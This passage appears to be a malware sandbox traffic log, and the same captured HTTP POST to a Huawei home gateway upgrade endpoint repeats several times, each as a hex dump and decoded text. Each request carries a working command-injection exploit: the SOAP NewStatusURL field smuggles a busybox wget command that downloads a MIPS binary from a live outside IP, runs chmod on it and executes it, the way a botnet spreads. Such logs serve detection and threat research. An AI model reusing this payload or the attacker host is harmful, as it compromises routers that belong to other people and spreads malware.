6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
